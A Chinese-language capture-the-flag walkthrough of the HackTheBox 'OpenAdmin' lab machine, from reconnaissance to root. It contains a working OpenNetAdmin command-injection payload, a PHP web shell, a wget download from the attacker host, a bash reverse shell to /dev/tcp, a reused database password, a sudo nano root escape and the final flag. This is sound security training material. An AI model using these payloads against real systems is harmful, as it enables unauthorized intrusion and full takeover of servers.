目标信息
IP地址:
10.10.10.171
信息收集
ICMP检测
┌──(root㉿misaka19008)-[/home/…/Documents/pentest_notes/openadmin/nmap_reports]
└─# ping -c 4 10.10.10.171
PING 10.10.10.171 (10.10.10.171) 56(84) bytes of data.
64 bytes from 10.10.10.171: icmp_seq=1 ttl=63 time=82.4 ms
64 bytes from 10.10.10.171: icmp_seq=2 ttl=63 time=157 ms
64 bytes from 10.10.10.171: icmp_seq=3 ttl=63 time=81.6 ms
64 bytes from 10.10.10.171: icmp_seq=4 ttl=63 time=100 ms
--- 10.10.10.171 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3032ms
rtt min/avg/max/mdev = 81.567/105.221/156.793/30.681 ms攻击机和靶机之间网络连通性良好。
防火墙检测
# Nmap 7.94SVN scan initiated Tue Aug 6 16:42:07 2024 as: nmap -sF -p- --min-rate 2000 -oN ./fin_result.txt 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.171 (10.10.10.171) are in ignored states.
Not shown: 64064 closed tcp ports (reset), 1471 open|filtered tcp ports (no-response)
# Nmap done at Tue Aug 6 16:45:43 2024 -- 1 IP address (1 host up) scanned in 215.43 seconds无法探测防火墙状态,直接进行TCP全端口半开扫描。
网络端口扫描
TCP端口扫描结果
# Nmap 7.94SVN scan initiated Tue Aug 6 16:51:31 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN ./tcp_result.txt 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/6%OT=22%CT=1%CU=39771%PV=Y%DS=2%DC=T%G=Y%TM=66B1E
OS:474%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=9)S
OS:EQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=100%GCD=2%ISR=106%TI=
OS:Z%CI=Z%II=I%TS=A)SEQ(SP=101%GCD=1%ISR=106%TI=Z%CI=Z%TS=9)OPS(O1=M53CST11
OS:NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53C
OS:ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=
OS:40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2
OS:(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 206.54 ms 10.10.14.1 (10.10.14.1)
2 208.45 ms 10.10.10.171 (10.10.10.171)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 6 16:53:08 2024 -- 1 IP address (1 host up) scanned in 96.54 secondsUDP端口开放列表扫描结果
# Nmap 7.94SVN scan initiated Tue Aug 6 16:55:43 2024 as: nmap -sU -p- --min-rate 2000 -oN ./udp_ports.txt 10.10.10.171
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.32s latency).
All 65535 scanned ports on 10.10.10.171 (10.10.10.171) are in ignored states.
Not shown: 65180 open|filtered udp ports (no-response), 355 closed udp ports (port-unreach)
# Nmap done at Tue Aug 6 17:01:46 2024 -- 1 IP address (1 host up) scanned in 363.04 secondsUDP端口详细信息扫描结果
(无)同时发现靶机操作系统为Ubuntu Linux。
服务探测
SSH服务(22端口)
端口Banner:
┌──(root㉿misaka19008)-[/home/megumin]
└─# nc -nv 10.10.10.171 22
(UNKNOWN) [10.10.10.171] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3Web应用程序(80端口)
打开主页:http://openadmin.htb/
直接扫描目录:
# Dirsearch started Wed Aug 7 08:11:41 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://openadmin.htb/ -x 400,403,404 -t 60 -e php,js,html,asp,aspx,txt,zip,tar.gz,pcap
301 314B http://openadmin.htb/music -> REDIRECTS TO: http://openadmin.htb/music/
301 312B http://openadmin.htb/ona -> REDIRECTS TO: http://openadmin.htb/ona/访问/music目录,发现貌似为一个静态站点:
访问/ona目录,发现该目录下部署了OpenNetAdmin v18.1.1网络管理系统:
经过联网查询,发现该系统存在严重的命令执行漏洞:
渗透测试
OpenNetAdmin RCE漏洞利用
通过阅读EXP代码,得知漏洞页面为login.php,而漏洞参数如下所示:
xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;{COMMAND};&xajaxargs[]=ping访问login.php,同时打开BurpSuite拦截请求包:
将请求包发送到Repeater模块,将POST请求数据替换为恶意数据,直接输入要执行的命令后发送:
xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;%65%63%68%6f%20%22%3c%63%6d%64%72%65%73%3e%22;id;hostnamectl;%65%63%68%6f%20%22%2f%3c%63%6d%64%72%65%73%3e%22;&xajaxargs[]=ping
漏洞测试成功!!接下来直接在本地创建后门文件:
<?php
$command = $_GET['cmd'];
if (isset($command) && !empty($command)) {
system($command);
} else die("Hello, hello, I'm sparkle!");
?>随后使用该漏洞下载后门:
xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;%65%63%68%6f%20%22%3c%63%6d%64%72%65%73%3e%22;wget%20http://10.10.14.14/sparkle.php;%65%63%68%6f%20%22%2f%3c%63%6d%64%72%65%73%3e%22;&xajaxargs[]=ping
成功!!!直接访问后门,反弹Shell:
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'
权限提升
移动至jimmy用户
进入系统之后进行信息预收集,发现靶机内有两个用户:jimmy和joanna:
同时发现OpenNetAdmin的数据库配置文件为:/opt/ona/www/local/config/database_settings.inc.php。尝试查看:
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>成功发现数据库登录凭据:
- 用户名:
ona_sys - 密码:
n1nj4W4rri0R! - 主机:
localhost
登录数据库探查,没有发现信息,尝试将数据库密码作为用户jimmy的密码切换用户:
成功!!
除此之外,还在/var/www目录下发现了internal文件夹,jimmy用户有权查看。
本地信息收集
基本系统信息
进程列表
计划任务列表
环境变量
用户信息
用户家目录
特殊权限文件
开放端口信息
敏感文件权限
经分析研判,发现靶机的52846端口只对本地IP开放,决定以其为入口进行提权。
52846端口渗透
首先在本地执行如下命令将该端口转发至攻击机上:
ssh -NfqL 52846:localhost:52846 jimmy@10.10.10.171随后使用Nmap扫描本机52846端口:
# Nmap 7.94SVN scan initiated Wed Aug 7 11:02:13 2024 as: nmap -sS -sV -A -p 52846 -oN ./52846_result.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000066s latency).
PORT STATE SERVICE VERSION
52846/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Tutorialspoint.com
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.7 (96%), Linux 3.8 - 4.14 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 3.7 - 3.11 (94%), Linux 2.6.32 (93%), Linux 3.7 - 3.10 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 7 11:02:36 2024 -- 1 IP address (1 host up) scanned in 23.41 seconds发现该端口为HTTP服务,直接打开:http://127.0.0.1:52846/
同时查看/var/www/internal目录下的index.php,发现网页上的内容和PHP文件中的HTML内容一模一样:
判断该端口HTTP服务的根目录为/var/www/internal,上传木马sparkle.php,尝试查看其用户:
成功发现该服务用户为joanna!现在尝试反弹Shell:
成功!!!
切换SSH登录
进入joanna用户后,发现在反弹Shell的场景下,sudo命令无法使用,决定上传本机的SSH公钥,使用SSH登录:
Sudo nano提权
登录joanna用户后,发现该用户可以免密以root权限运行nano编辑器:
直接执行以下命令提权:
sudo /bin/nano /opt/priv
[Ctrl + R][Ctrl + X]
reset; sh 1>&0 2>&0
提权成功!!!!
Flag文件展示
18e7e4fec22edf7d01e121da577b6ef8